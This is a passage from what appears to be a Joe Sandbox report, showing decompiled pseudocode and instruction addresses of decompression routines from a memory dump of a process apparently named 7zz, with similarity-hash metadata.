														__eflags = _t313 -  *((intOrPtr*)(_t329 + 8));
														if(__eflags == 0) {
															E0040EFBD(_t329, __eflags);
														}
														_t150 =  *(_t356 + 0x1c) + 1;
														__eflags = _t150;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											} else {
												_t228 =  *(_t337 + 0x23c);
												E0041F43D(_t333);
												_t185 =  *(_t333 + 0x30);
												_push(_t333);
												 *_t333 =  *_t333 + _t228;
												_t229 =  *(_t356 + 0x14);
												_t342 = (0x00000001 << _t228) - 0x00000001 & _t185;
												_t41 = _t229 + 0x1a0; // 0x1001a0
												 *(_t333 + 0x30) = _t185 >> _t228;
												_t187 = E0044EBB0(_t41);
												__eflags = _t187 - 0x40;
												if(_t187 >= 0x40) {
													L69:
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120(_t229);
													_t153 = 1;
												} else {
													_push(_t333);
													_t44 = _t229 + 0x108; // 0x100108
													 *(_t356 + 0x54) = (_t187 <<  *(_t229 + 0x23c)) + _t342;
													_t191 = E0044EBB0(_t44);
													__eflags = _t191 - 0x40;
													if(_t191 >= 0x40) {
														goto L69;
													} else {
														_t231 =  *((intOrPtr*)(_t229 + 0x240)) + _t191;
														__eflags = _t191 - 0x3f;
														if(_t191 == 0x3f) {
															__eflags =  *_t333 - 8;
															if( *_t333 >= 8) {
																do {
																	 *(_t356 + 0x48) = 0;
																	_t209 = E0044AD80(_t333 + 8, _t356 + 0x44);
																	__eflags = _t209;
																	if(_t209 == 0) {
																		 *(_t356 + 0x44) = 0xff;
																		_t216 =  *(_t333 + 0x28) + 1;
																		__eflags = _t216;
																		 *(_t333 + 0x28) = _t216;
																	}
																	_t326 =  *_t333;
																	 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x44) & 0x000000ff) << 0x00000020 - _t326;
																	_t214 = _t326 - 8;
																	__eflags = _t214 - 8;
																	 *(_t333 + 4) =  *(_t333 + 4) << 8;
																	 *_t333 = _t214;
																} while (_t214 >= 8);
															}
															_t207 =  *(_t333 + 0x30);
															 *_t333 =  *_t333 + 8;
															 *(_t333 + 0x30) = _t207 >> 8;
															_t231 = _t231 + (_t207 & 0x000000ff);
															__eflags = _t231;
														}
														__eflags = 0 -  *((intOrPtr*)(_t356 + 0x20));
														_t193 =  *(_t356 + 0x1c);
														if(__eflags < 0) {
															L33:
															__eflags = _t231;
															if(_t231 > 0) {
																_t285 =  *(_t329 + 4);
																_t316 =  *(_t356 + 0x50);
																 *(_t356 + 0x48) = _t231;
																_t349 = _t285 - _t316 - 1;
																__eflags = _t316 - _t285;
																if(_t316 < _t285) {
																	L38:
																	__eflags =  *((intOrPtr*)(_t329 + 8)) - _t285 - _t231;
																	if( *((intOrPtr*)(_t329 + 8)) - _t285 <= _t231) {
																		L43:
																		__eflags = _t349 -  *((intOrPtr*)(_t329 + 0x10));
																		if(_t349 ==  *((intOrPtr*)(_t329 + 0x10))) {
																			_t349 = 0;
																			__eflags = 0;
																		}
																		 *((char*)( *_t329 +  *(_t329 + 4))) =  *((intOrPtr*)( *_t329 + _t349));
																		_t198 =  *(_t329 + 4) + 1;
																		_t349 = _t349 + 1;
																		__eflags = _t198 -  *((intOrPtr*)(_t329 + 8));
																		 *(_t329 + 4) = _t198;
																		if(__eflags == 0) {
																			E0040EFBD(_t329, __eflags);
																		}
																		_t200 =  *(_t356 + 0x48) - 1;
																		__eflags = _t200;
																		 *(_t356 + 0x48) = _t200;
																	} else {
																		__eflags =  *((intOrPtr*)(_t329 + 0x10)) - _t349 - _t231;
																		if( *((intOrPtr*)(_t329 + 0x10)) - _t349 <= _t231) {
																			do {
																				goto L43;
																			} while (_t200 != 0);
																		} else {
																			_t202 =  *_t329;
																			_t350 = _t349 + _t202;
																			_t203 = _t202 + _t285;
																			_t289 = _t285 + _t231;
																			__eflags = _t289;
																			 *(_t329 + 4) = _t289;
																			do {
																				 *_t203 =  *_t350;
																				_t203 = _t203 + 1;
																				_t350 = _t350 + 1;
																				_t292 =  *(_t356 + 0x48) - 1;
																				__eflags = _t292;
																				 *(_t356 + 0x48) = _t292;
																			} while (_t292 != 0);
																		}
																	}
																	_t193 =  *(_t356 + 0x1c);
																} else {
																	__eflags =  *(_t329 + 0x24);
																	if( *(_t329 + 0x24) != 0) {
																		_t321 =  *((intOrPtr*)(_t329 + 0x10));
																		__eflags =  *(_t356 + 0x50) - _t321;
																		if( *(_t356 + 0x50) < _t321) {
																			_t349 = _t349 + _t321;
																			__eflags = _t349;
																			goto L38;
																		}
																	}
																}
															}
														} else {
															if(__eflags > 0) {
																goto L27;
															} else {
																__eflags =  *(_t356 + 0x50) - _t193;
																if( *(_t356 + 0x50) < _t193) {
																	goto L33;
																} else {
																	while(1) {
																		L27:
																		__eflags = _t231;
																		if(_t231 <= 0) {
																			goto L49;
																		}
																		 *( *(_t329 + 4) +  *_t329) = 0;
																		_t324 =  *(_t329 + 4) + 1;
																		 *(_t329 + 4) = _t324;
																		__eflags = _t324 -  *((intOrPtr*)(_t329 + 8));
																		if(__eflags == 0) {
																			E0040EFBD(_t329, __eflags);
																		}
																		_t295 =  *((intOrPtr*)(_t356 + 0x20));
																		_t193 =  *(_t356 + 0x1c) + 1;
																		asm("adc ecx, 0x0");
																		_t231 = _t231 - 1;
																		__eflags = 0 - _t295;
																		 *(_t356 + 0x1c) = _t193;
																		 *((intOrPtr*)(_t356 + 0x20)) = _t295;
																		if(__eflags > 0) {
																			continue;
																		} else {
																			if(__eflags < 0) {
																				goto L33;
																			} else {
																				__eflags =  *(_t356 + 0x50) - _t193;
																				if( *(_t356 + 0x50) >= _t193) {
																					continue;
																				} else {
																					goto L33;
																				}
																			}
																		}
																		goto L49;
																	}
																}
															}
														}
														L49:
														_t337 =  *((intOrPtr*)(_t356 + 0x10));
														_t150 = _t193 + _t231;
														asm("adc ecx, 0x0");
														 *(_t356 + 0x1c) = _t150;
														goto L61;
													}
												}
											}
										} else {
											__eflags = _t150 & 0x0000ffff;
											if((_t150 & 0x0000ffff) != 0) {
												goto L15;
											} else {
												asm("cdq");
												asm("sbb edx, ebp");
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t333 + 8)) -  *((intOrPtr*)(_t333 + 0x10)) - (0x20 -  *_t333 >> 3) +  *(_t333 + 0x28) +  *((intOrPtr*)(_t333 + 0x18));
												asm("adc edx, ebp");
												 *((intOrPtr*)(_t356 + 0x34)) = _t309;
												_t232 =  *((intOrPtr*)( *_t221 + 0xc))(_t221, _t356 + 0x2c, _t356 + 0x1c);
												__eflags = _t232;
												if(_t232 != 0) {
													 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
													E0044E120( *((intOrPtr*)(_t356 + 0x10)));
													_t153 = _t232;
												} else {
													_t337 =  *((intOrPtr*)(_t356 + 0x10));
													goto L15;
												}
											}
										}
									} else {
										__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
										if(_t150 <  *((intOrPtr*)(_t356 + 0x24))) {
											goto L11;
											do {
												do {
													goto L11;
													L61:
													_t309 =  *((intOrPtr*)(_t356 + 0x28));
													__eflags =  *((intOrPtr*)(_t356 + 0x20)) - _t309;
												} while (__eflags < 0);
												if(__eflags > 0) {
													goto L64;
												} else {
													goto L63;
												}
												goto L71;
												L63:
												__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											} while (_t150 <  *((intOrPtr*)(_t356 + 0x24)));
										}
										goto L64;
									}
								}
							} else {
								 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
								E0044E120(_t337);
								_t153 = 1;
							}
						} else {
							_t153 = 0x80070057;
						}
					} else {
						_t153 = 0x8007000e;
					}
				} else {
					_t153 = 0x8007000e;
				}
				L71:
				 *[fs:0x0] =  *((intOrPtr*)(_t356 + 0x34));
				return _t153;
			}

0x0044e430
0x0044e432
0x0044e43d
0x0044e43e
0x0044e445
0x0044e44a
0x0044e453
0x0044e456
0x0044e463
0x0044e46f
0x0044e474
0x0044e47a
0x0044e47f
0x0044e481
0x0044e48d
0x0044e493
0x0044e495
0x0044e4aa
0x0044e4b1
0x0044e4b5
0x0044e4b9
0x0044e4bd
0x0044e4c5
0x0044e4d1
0x0044e4d6
0x0044e4dc
0x0044e4e1
0x0044e4e7
0x0044e4ea
0x0044e4ed
0x0044e4f0
0x0044e4f6
0x0044e4fa
0x0044e4ff
0x0044e501
0x0044e51c
0x0044e524
0x0044e526
0x0044e52a
0x0044e8ae
0x0044e8b6
0x0044e8b8
0x0044e903
0x0044e905
0x0044e90e
0x0044e916
0x0044e91b
0x0044e8ba
0x0044e8ba
0x00000000
0x0044e8bc
0x0044e8bc
0x0044e8c0
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e8c0
0x0044e8ba
0x0044e530
0x0044e530
0x0044e53c
0x0044e53c
0x0044e540
0x0044e542
0x0044e5a1
0x0044e5a3
0x0044e5a8
0x0044e5b5
0x0044e5b7
0x0044e5b9
0x0044e5bc
0x0044e7c7
0x0044e7c9
0x0044e7e3
0x0044e7e6
0x0044e7e8
0x0044e7f0
0x0044e7f5
0x0044e7fa
0x0044e7fc
0x0044e801
0x0044e806
0x0044e806
0x0044e807
0x0044e807
0x0044e80e
0x0044e825
0x0044e838
0x0044e83b
0x0044e83e
0x0044e841
0x0044e841
0x0044e7e8
0x0044e845
0x0044e84f
0x0044e855
0x0044e857
0x0044e857
0x0044e85a
0x00000000
0x0044e7cb
0x0044e7cb
0x0044e7cf
0x0044e7d4
0x0044e7d9
0x0044e8c2
0x0044e8c4
0x0044e8cc
0x0044e8d1
0x0044e7df
0x0044e7df
0x0044e85d
0x0044e862
0x0044e86b
0x0044e86e
0x0044e871
0x0044e873
0x0044e877
0x0044e877
0x0044e884
0x0044e884
0x0044e887
0x0044e88a
0x00000000
0x0044e88e
0x0044e7d9
0x0044e5c2
0x0044e5c2
0x0044e5ca
0x0044e5cf
0x0044e5d9
0x0044e5e0
0x0044e5e4
0x0044e5e9
0x0044e5ed
0x0044e5f3
0x0044e5f6
0x0044e5fb
0x0044e5fe
0x0044e8ed
0x0044e8ef
0x0044e8f7
0x0044e8fc
0x0044e604
0x0044e60a
0x0044e60d
0x0044e615
0x0044e619
0x0044e61e
0x0044e621
0x00000000
0x0044e627
0x0044e62d
0x0044e62f
0x0044e632
0x0044e634
0x0044e637
0x0044e639
0x0044e641
0x0044e646
0x0044e64b
0x0044e64d
0x0044e652
0x0044e657
0x0044e657
0x0044e658
0x0044e658
0x0044e65f
0x0044e676
0x0044e689
0x0044e68c
0x0044e68f
0x0044e692
0x0044e692
0x0044e639
0x0044e696
0x0044e6a6
0x0044e6ab
0x0044e6ae
0x0044e6ae
0x0044e6ae
0x0044e6b6
0x0044e6b8
0x0044e6bc
0x0044e711
0x0044e711
0x0044e713
0x0044e719
0x0044e71c
0x0044e722
0x0044e728
0x0044e729
0x0044e72b
0x0044e73f
0x0044e744
0x0044e746
0x0044e770
0x0044e770
0x0044e773
0x0044e775
0x0044e775
0x0044e775
0x0044e77f
0x0044e788
0x0044e789
0x0044e78a
0x0044e78c
0x0044e78f
0x0044e793
0x0044e793
0x0044e79c
0x0044e79c
0x0044e79d
0x0044e748
0x0044e74d
0x0044e74f
0x0044e770
0x00000000
0x00000000
0x0044e751
0x0044e751
0x0044e753
0x0044e755
0x0044e757
0x0044e757
0x0044e759
0x0044e75c
0x0044e75f
0x0044e765
0x0044e766
0x0044e767
0x0044e767
0x0044e768
0x0044e768
0x0044e76e
0x0044e74f
0x0044e7a3
0x0044e72d
0x0044e730
0x0044e732
0x0044e734
0x0044e737
0x0044e73b
0x0044e73d
0x0044e73d
0x00000000
0x0044e73d
0x0044e73b
0x0044e732
0x0044e72b
0x0044e6be
0x0044e6be
0x00000000
0x0044e6c0
0x0044e6c0
0x0044e6c4
0x00000000
0x00000000
0x0044e6c6
0x0044e6c6
0x0044e6c6
0x0044e6c8
0x00000000
0x00000000
0x0044e6d3
0x0044e6dd
0x0044e6e0
0x0044e6e3
0x0044e6e5
0x0044e6e9
0x0044e6e9
0x0044e6f2
0x0044e6f6
0x0044e6f9
0x0044e6fc
0x0044e6fd
0x0044e6ff
0x0044e703
0x0044e707
0x00000000
0x0044e709
0x0044e709
0x00000000
0x0044e70b
0x0044e70b
0x0044e70f
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e70f
0x0044e709
0x00000000
0x0044e707
0x0044e6c6
0x0044e6c4
0x0044e6be
0x0044e7a7
0x0044e7ab
0x0044e7af
0x0044e7b1
0x0044e7b4
0x00000000
0x0044e7b8
0x0044e621
0x0044e5fe
0x0044e544
0x0044e54b
0x0044e54d
0x00000000
0x0044e54f
0x0044e562
0x0044e56b
0x0044e572
0x0044e57d
0x0044e585
0x0044e588
0x0044e593
0x0044e595
0x0044e597
0x0044e8dc
0x0044e8e4
0x0044e8e9
0x0044e59d
0x0044e59d
0x00000000
0x0044e59d
0x0044e597
0x0044e54d
0x0044e532
0x0044e532
0x0044e536
0x00000000
0x0044e53c
0x0044e53c
0x00000000
0x0044e892
0x0044e896
0x0044e89a
0x0044e89a
0x0044e8a2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044e8a4
0x0044e8a4
0x0044e8a4
0x0044e53c
0x00000000
0x0044e536
0x0044e530
0x0044e503
0x0044e505
0x0044e50d
0x0044e512
0x0044e512
0x0044e497
0x0044e497
0x0044e497
0x0044e483
0x0044e483
0x0044e483
0x0044e465
0x0044e465
0x0044e465
0x0044e91d
0x0044e925
0x0044e92f

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
Instruction ID: 149f3ba7fcc7b310817431056b7830669582af05e2817226ce6dbfe3fe10b790
Opcode Fuzzy Hash: bdb79ba1893ab33bcd4eb932cbc06b661e8d4d2b215cf5133c1798053672a223
Instruction Fuzzy Hash: 33F1B3706047428FEB14DF2AC59062AF7E1FF89314F544A2EE4E687781D738E945CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00453740 Relevance: .4, Instructions: 388
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00453740(void* __ecx) {
				signed int _t147;
				signed int _t156;
				short* _t158;
				signed int _t164;
				signed int _t165;
				signed int _t174;
				void* _t176;
				signed int _t177;
				signed int _t182;
				signed char _t185;
				void* _t191;
				signed int _t196;
				unsigned short* _t197;
				signed int _t199;
				short* _t200;
				signed int _t204;
				signed int _t210;
				signed int _t212;
				signed char _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				short _t229;
				intOrPtr _t236;
				signed int _t237;
				short _t241;
				signed int _t245;
				signed int _t257;
				void* _t261;
				signed int _t263;
				intOrPtr* _t265;
				signed int _t266;
				intOrPtr* _t268;
				void* _t278;
				unsigned short _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t289;
				signed int _t290;
				intOrPtr _t297;
				signed int _t300;
				void* _t301;
				signed int _t302;
				signed char _t303;
				signed int _t304;
				signed int _t307;
				signed int _t308;
				intOrPtr _t311;
				short* _t313;
				void* _t320;
				short* _t321;
				signed int _t322;
				signed int _t326;
				signed int _t328;
				void* _t329;

				_t320 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x78)) != 0xfffffffe) {
					L10:
					_t300 =  *(_t329 + 0x20);
					__eflags = _t300;
					if(_t300 != 0) {
						_t147 =  *(_t320 + 0x78);
						__eflags = _t147;
						if(_t147 <= 0) {
							L20:
							__eflags = _t300;
							if(_t300 <= 0) {
								goto L71;
							} else {
								while(1) {
									__eflags =  *(_t320 + 0x6c);
									if( *(_t320 + 0x6c) != 0) {
										break;
									}
									_t321 = _t320 + 0x90;
									_t241 =  *_t321;
									_t156 = (( *(_t320 + 0x40) + 1) * 0 - 1) /  *(_t320 + 0x3c);
									_t278 = _t320 + 0x92;
									_t301 = 1;
									__eflags = 0 - _t156;
									while(0 > _t156) {
										_t278 = _t278 + 2;
										_t301 = _t301 + 1;
										__eflags = 0 - _t156;
									}
									E00453C00(_t320 + 0x38, 0, 0, _t241);
									_t302 = _t301 - 1;
									__eflags = 0;
									_t223 =  *((intOrPtr*)(_t302 + _t320 + 0x112));
									_t158 = _t320 + 0x90 + _t302 * 2;
									 *(_t329 + 0x10) = 0;
									do {
										 *_t158 =  *_t158 + 8;
										_t245 = _t302;
										_t302 = _t302 - 1;
										_t158 = _t158 - 2;
										__eflags = _t245;
									} while (_t245 != 0);
									__eflags =  *_t321 - 0xed8;
									if( *_t321 > 0xed8) {
										_t196 =  *(_t320 + 0x8c) - 1;
										__eflags = _t196;
										 *(_t320 + 0x8c) = _t196;
										if(_t196 != 0) {
											_t263 =  *(_t320 + 0x88) - 1;
											__eflags = _t263;
											_t197 = _t320 + 0x90 + _t263 * 2;
											do {
												 *_t197 =  *_t197 >> 1;
												_t284 = _t197[1];
												__eflags =  *_t197 - _t284;
												if( *_t197 <= _t284) {
													_t286 = _t284 + 1;
													__eflags = _t286;
													 *_t197 = _t286;
												}
												_t285 = _t263;
												_t263 = _t263 - 1;
												_t197 = _t197 - 2;
												__eflags = _t285;
											} while (_t285 != 0);
										} else {
											 *(_t320 + 0x8c) = 0x32;
											__eflags =  *(_t320 + 0x88);
											if( *(_t320 + 0x88) > 0) {
												_t200 = _t321;
												do {
													_t200 = _t200 + 2;
													 *((short*)(_t200 - 2)) = 1 >> 1;
													_t245 = _t245 + 1;
													__eflags = _t245 -  *(_t320 + 0x88);
												} while (_t245 <  *(_t320 + 0x88));
											}
											_t287 =  *(_t320 + 0x88);
											_t199 = 0;
											__eflags = _t287 - 1;
											if(_t287 - 1 > 0) {
												do {
													_t61 = _t199 + 1; // 0x1
													_t266 = _t61;
													__eflags = _t266 - _t287;
													 *(_t329 + 0x18) = _t266;
													if(_t266 < _t287) {
														_t313 = _t321 + 2;
														do {
															_t290 =  *_t321;
															_t229 =  *_t313;
															__eflags = _t290 - _t229;
															 *(_t329 + 0x14) = _t290;
															if(_t290 < _t229) {
																 *_t321 = _t229;
																 *((char*)(_t320 + _t199 + 0x112)) =  *((intOrPtr*)(_t320 + _t266 + 0x112));
																 *_t313 =  *(_t329 + 0x14);
																 *((char*)(_t320 + _t266 + 0x112)) =  *((intOrPtr*)(_t320 + _t199 + 0x112));
															}
															_t266 = _t266 + 1;
															_t313 = _t313 + 2;
															__eflags = _t266 -  *(_t320 + 0x88);
														} while (_t266 <  *(_t320 + 0x88));
														_t223 =  *(_t329 + 0x10);
														_t266 =  *(_t329 + 0x18);
													}
													_t287 =  *(_t320 + 0x88);
													_t199 = _t266;
													_t321 = _t321 + 2;
													__eflags = _t199 - _t287 - 1;
												} while (_t199 < _t287 - 1);
											}
											_t265 = _t320 + 0x90 + _t199 * 2;
											do {
												 *_t265 =  *_t265 +  *((intOrPtr*)(_t265 + 2));
												_t289 = _t199;
												_t199 = _t199 - 1;
												_t265 = _t265 - 2;
												__eflags = _t289;
											} while (_t289 != 0);
										}
									}
									__eflags = _t223 - 4;
									if(_t223 >= 4) {
										_t224 = _t223 + 0xfffffffc;
										__eflags = _t224 - 2;
										 *(_t329 + 0x18) = _t224;
										_t303 = _t224 + 3;
										 *(_t329 + 0x10) = _t303;
										if(_t224 == 2) {
											_push(_t320 + 0x38);
											_t176 = E00453CE0(_t320 + 0x6e8);
											__eflags = _t176 - 6;
											if(_t176 < 6) {
												_t303 = _t303 + _t176;
												 *(_t329 + 0x10) = _t303;
											} else {
												_t177 = _t176 - _t224;
												_t257 = _t177 >> 2;
												__eflags = _t257 - 6;
												 *(_t329 + 0x10) = _t303 + ((_t177 & 0x00000003 | 0x00000004) << _t257) - 2;
												if(_t257 >= 6) {
													_t303 =  *(_t329 + 0x10);
												} else {
													_t326 = _t257;
													_t308 = 0;
													__eflags = 0;
													do {
														_t182 = E00453BB0();
														_t326 = _t326 - 1;
														__eflags = _t326;
														_t308 = _t182 | _t308 + _t308;
													} while (_t326 != 0);
													_t224 =  *(_t329 + 0x18);
													_t185 =  *(_t329 + 0x10) + _t308;
													 *(_t329 + 0x10) = _t185;
													_t303 = _t185;
												}
											}
										}
										_push(_t320 + 0x38);
										_t322 = E00453CE0(_t320 + 0x484 + ((_t224 << 4) + _t224 + ((_t224 << 4) + _t224) * 2) * 4);
										__eflags = _t322 - 4;
										if(_t322 >= 4) {
											_t307 = (_t322 >> 1) - 1;
											_t226 = 0;
											__eflags = 0;
											 *(_t329 + 0x14) = _t307;
											do {
												_t226 = E00453BB0() | _t226 + _t226;
												_t174 =  *(_t329 + 0x14) - 1;
												__eflags = _t174;
												 *(_t329 + 0x14) = _t174;
											} while (_t174 != 0);
											_t303 =  *(_t329 + 0x10);
											_t322 = ((_t322 & 0x00000001 | 0x00000002) << _t307) + _t226;
											__eflags = _t322;
										}
										_t164 =  *(_t329 + 0x20);
										_t225 = _t303;
										__eflags = _t303 - _t164;
										if(_t303 > _t164) {
											_t225 = _t164;
										}
										_push(_t225);
										_push(_t322);
										_t165 = E0044ADB0(_t320 + 0x10);
										__eflags = _t165;
										if(_t165 == 0) {
											break;
										} else {
											_t304 = _t303 - _t225;
											__eflags = _t304;
											 *(_t329 + 0x20) =  *(_t329 + 0x20) - _t225;
											if(_t304 != 0) {
												 *(_t320 + 0x78) = _t304;
												 *(_t320 + 0x7c) = _t322;
												__eflags =  *(_t320 + 0x6c);
												_t142 =  *(_t320 + 0x6c) != 0;
												__eflags = _t142;
												return 0 | _t142;
											} else {
												goto L66;
											}
										}
									} else {
										_push(_t320 + 0x38);
										_t191 = E00453CE0(_t320 + 0x154 + ((_t223 << 4) + _t223 + ((_t223 << 4) + _t223) * 2) * 4);
										_t261 = _t320 + 0x10;
										 *((char*)( *((intOrPtr*)(_t320 + 0x14)) +  *((intOrPtr*)(_t320 + 0x10)))) = _t191 + (_t223 << 6);
										_t311 =  *((intOrPtr*)(_t261 + 4)) + 1;
										 *((intOrPtr*)(_t261 + 4)) = _t311;
										__eflags = _t311 -  *((intOrPtr*)(_t261 + 8));
										if(__eflags == 0) {
											E0040EFBD(_t261, __eflags);
										}
										 *(_t329 + 0x20) =  *(_t329 + 0x20) - 1;
										L66:
										__eflags =  *(_t329 + 0x20);
										if( *(_t329 + 0x20) > 0) {
											continue;
										} else {
											__eflags =  *(_t320 + 0x6c);
											_t137 =  *(_t320 + 0x6c) != 0;
											__eflags = _t137;
											return 0 | _t137;
										}
									}
									goto L72;
								}
								return 1;
							}
						} else {
							while(1) {
								__eflags = _t300;
								if(_t300 <= 0) {
									break;
								}
								_t268 = _t320 + 0x10;
								 *(_t320 + 0x78) = _t147 - 1;
								_t297 =  *((intOrPtr*)(_t268 + 0x10));
								_t204 =  *((intOrPtr*)(_t268 + 4)) -  *(_t320 + 0x7c) - 1;
								__eflags = _t204 - _t297;
								if(_t204 >= _t297) {
									_t204 = _t204 + _t297;
									__eflags = _t204;
								}
								 *((char*)( *((intOrPtr*)(_t268 + 4)) +  *_t268)) =  *((intOrPtr*)( *_t268 + _t204));
								_t236 =  *((intOrPtr*)(_t268 + 4)) + 1;
								 *((intOrPtr*)(_t268 + 4)) = _t236;
								__eflags = _t236 -  *((intOrPtr*)(_t268 + 8));
								if(__eflags == 0) {
									E0040EFBD(_t268, __eflags);
								}
								_t147 =  *(_t320 + 0x78);
								_t300 = _t300 - 1;
								__eflags = _t147;
								if(_t147 > 0) {
									continue;
								} else {
									 *(_t329 + 0x20) = _t300;
									goto L20;
								}
								goto L72;
							}
							 *(_t329 + 0x20) = _t300;
							L71:
							__eflags =  *(_t320 + 0x6c);
							_t146 =  *(_t320 + 0x6c) != 0;
							__eflags = _t146;
							return 0 | _t146;
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					if( *((intOrPtr*)(__ecx + 0x84)) != 0) {
						L5:
						_t210 = E0040DF95(_t320 + 0x50, 0x100000);
						__eflags = _t210;
						if(_t210 != 0) {
							_t7 = _t320 + 0x50; // 0x8
							E0040DFF3(_t7);
							_t237 = 0;
							__eflags = 0;
							 *(_t320 + 0x48) = 0x10000;
							 *((intOrPtr*)(_t320 + 0x38)) = 0;
							 *(_t320 + 0x3c) = 0x10000;
							_t328 = 0x10;
							do {
								_t212 = E00453BB0();
								_t328 = _t328 - 1;
								__eflags = _t328;
								_t237 = _t212 | _t237 + _t237;
							} while (_t328 != 0);
							 *(_t320 + 0x40) = _t237;
							 *(_t320 + 0x78) = 0;
							goto L10;
						} else {
							return 0x8007000e;
						}
					} else {
						if(E0040EE76(__ecx + 0x10, 1 <<  *(__ecx + 0x80)) != 0) {
							E004535D0(__ecx);
							goto L5;
						} else {
							return 0x8007000e;
						}
					}
				}
				L72:
			}

0x00453746
0x0045374d
0x004537ea
0x004537ea
0x004537ee
0x004537f0
0x004537fe
0x00453801
0x00453803
0x00453854
0x00453854
0x00453856
0x00000000
0x0045385c
0x0045385c
0x0045385f
0x00453861
0x00000000
0x00000000
0x0045386a
0x00453873
0x0045387f
0x00453889
0x0045388f
0x00453894
0x00453896
0x00453898
0x0045389d
0x004538a1
0x004538a1
0x004538bf
0x004538c4
0x004538c5
0x004538c7
0x004538ce
0x004538d5
0x004538d9
0x004538d9
0x004538dd
0x004538df
0x004538e0
0x004538e3
0x004538e3
0x004538e7
0x004538ed
0x004538f9
0x004538f9
0x004538fa
0x00453900
0x004539db
0x004539db
0x004539dc
0x004539e3
0x004539e3
0x004539e9
0x004539ed
0x004539f0
0x004539f2
0x004539f2
0x004539f3
0x004539f3
0x004539f6
0x004539f8
0x004539f9
0x004539fc
0x004539fc
0x00453906
0x0045390c
0x00453916
0x00453918
0x0045391a
0x0045391c
0x00453929
0x0045392f
0x00453939
0x0045393a
0x0045393a
0x0045391c
0x0045393e
0x00453944
0x00453949
0x0045394b
0x0045394d
0x0045394d
0x0045394d
0x00453950
0x00453952
0x00453956
0x00453958
0x0045395b
0x0045395b
0x0045395f
0x00453962
0x00453965
0x00453969
0x00453972
0x0045397d
0x00453989
0x0045398c
0x0045398c
0x00453999
0x0045399a
0x0045399d
0x0045399d
0x004539a1
0x004539a5
0x004539a5
0x004539a9
0x004539af
0x004539b1
0x004539b7
0x004539b7
0x0045394d
0x004539bb
0x004539c2
0x004539c6
0x004539c9
0x004539cb
0x004539cc
0x004539cf
0x004539cf
0x004539d3
0x00453900
0x00453a00
0x00453a03
0x00453a4e
0x00453a51
0x00453a54
0x00453a58
0x00453a5b
0x00453a5f
0x00453a6a
0x00453a6b
0x00453a70
0x00453a73
0x00453aba
0x00453abc
0x00453a75
0x00453a75
0x00453a7c
0x00453a83
0x00453a8a
0x00453a8e
0x00453ac2
0x00453a90
0x00453a90
0x00453a92
0x00453a92
0x00453a97
0x00453a99
0x00453aa3
0x00453aa3
0x00453aa4
0x00453aa4
0x00453aac
0x00453ab0
0x00453ab2
0x00453ab6
0x00453ab6
0x00453a8e
0x00453a73
0x00453ac9
0x00453ae0
0x00453ae2
0x00453ae5
0x00453aeb
0x00453aec
0x00453aec
0x00453aee
0x00453af2
0x00453aff
0x00453b05
0x00453b05
0x00453b06
0x00453b06
0x00453b11
0x00453b1a
0x00453b1a
0x00453b1a
0x00453b1c
0x00453b20
0x00453b22
0x00453b24
0x00453b26
0x00453b26
0x00453b28
0x00453b29
0x00453b2d
0x00453b32
0x00453b34
0x00000000
0x00453b36
0x00453b3c
0x00453b3c
0x00453b3e
0x00453b42
0x00453b73
0x00453b76
0x00453b80
0x00453b84
0x00453b84
0x00453b8a
0x00000000
0x00000000
0x00000000
0x00453b42
0x00453a05
0x00453a08
0x00453a1a
0x00453a25
0x00453a2d
0x00453a36
0x00453a39
0x00453a3c
0x00453a3e
0x00453a40
0x00453a40
0x00453a45
0x00453b44
0x00453b48
0x00453b4a
0x00000000
0x00453b50
0x00453b57
0x00453b5b
0x00453b5b
0x00453b61
0x00453b61
0x00453b4a
0x00000000
0x00453a03
0x00453b70
0x00453b70
0x00453805
0x00453805
0x00453805
0x00453807
0x00000000
0x00000000
0x00453811
0x00453814
0x0045381c
0x0045381f
0x00453820
0x00453822
0x00453824
0x00453824
0x00453824
0x00453830
0x00453839
0x0045383c
0x0045383f
0x00453841
0x00453843
0x00453843
0x00453848
0x0045384b
0x0045384c
0x0045384e
0x00000000
0x00453850
0x00453850
0x00000000
0x00453850
0x00000000
0x0045384e
0x00453b8d
0x00453b91
0x00453b98
0x00453b9c
0x00453b9c
0x00453ba2
0x00453ba2
0x004537f5
0x004537f5
0x004537fb
0x004537fb
0x00453753
0x0045375b
0x0045378d
0x00453795
0x0045379a
0x0045379c
0x004537b0
0x004537b3
0x004537b8
0x004537b8
0x004537ba
0x004537c0
